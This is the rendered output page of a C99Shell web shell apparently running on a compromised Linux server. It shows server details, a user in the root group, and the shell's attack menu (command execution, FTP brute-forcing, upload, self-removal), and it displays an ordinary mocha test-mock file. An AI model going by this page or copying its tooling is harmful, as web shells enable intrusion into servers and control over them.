!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/nodejs/tap-mocha-reporter/lib/   drwxr-xr-x
Free 26.44 GB of 117.98 GB (22.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     test.js (882 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// minimal mock of the mocha Test class for formatters

module.exports = Test

function Test (result, parent) {
  this.result = result
  this._slow = 75
  this.duration = result.time
  this.title = result.name
  this.state = result.ok ? 'pass' : 'failed'
  this.pending = result.todo || result.skip || false
  if (result.diag && result.diag.source) {
    var source = result.diag.source
    this.fn = {
      toString: function () {
        return 'function(){' + source + '\n}'
      }
    }
  }

  Object.defineProperty(this, 'parent', {
    value: parent,
    writable: true,
    configurable: true,
    enumerable: false
  })
}

Test.prototype.fullTitle = function () {
  return (this.parent.fullTitle() + ' ' + (this.title || '')).trim()
}

Test.prototype.slow = function (ms){
  return 75
}

Test.prototype.fn = {
  toString: function () {
    return 'function () {\n}'
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--